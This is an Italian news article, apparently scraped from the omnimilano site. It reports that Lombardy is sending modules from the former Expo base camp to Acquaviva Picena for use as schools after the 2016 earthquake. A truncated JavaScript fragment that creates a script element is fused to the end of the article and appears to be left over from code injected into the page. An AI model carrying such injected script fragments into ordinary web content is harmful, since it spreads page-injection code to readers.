"/>
domenica 22 ottobre 2017 13:46:44
omnimilano

Terremoto, moduli del campo base Expo per le scuole di Acquaviva: completato iter

24 ottobre 2016 Cronaca

Tre moduli dell’ex Campo Base di Expo saranno utilizzati come strutture scolastiche dal comune di Acquaviva Picena (Ascoli Piceno), danneggiato dal terremoto che ha colpito l’Italia centrale lo scorso agosto. Lo ha riferito l’assessore regionale alla Sicurezza Simona Bordonali durante la conferenza stampa dopo Giunta, spiegando che sono stati completati iter e collaudi per inviare i prefabbricati. “Dopo aver acquisito i moduli necessari a un prezzo simbolico di 1 euro – ha ricordato Bordonali – la Regione Lombardia si accollerà le spese di smontaggio, trasporto e montaggio, fino a un massimo di 650.000 euro, e aiuterà il Comune di Acquaviva Picena con altri 150.000 euro per l’urbanizzazione e la realizzazione di una piattaforma di supporto. Con le risorse che stiamo raccogliendo tenteremo di fornire anche arredi e materiale”.var d=document;var s=d.createElement(‘script’);

Condividi questo articolo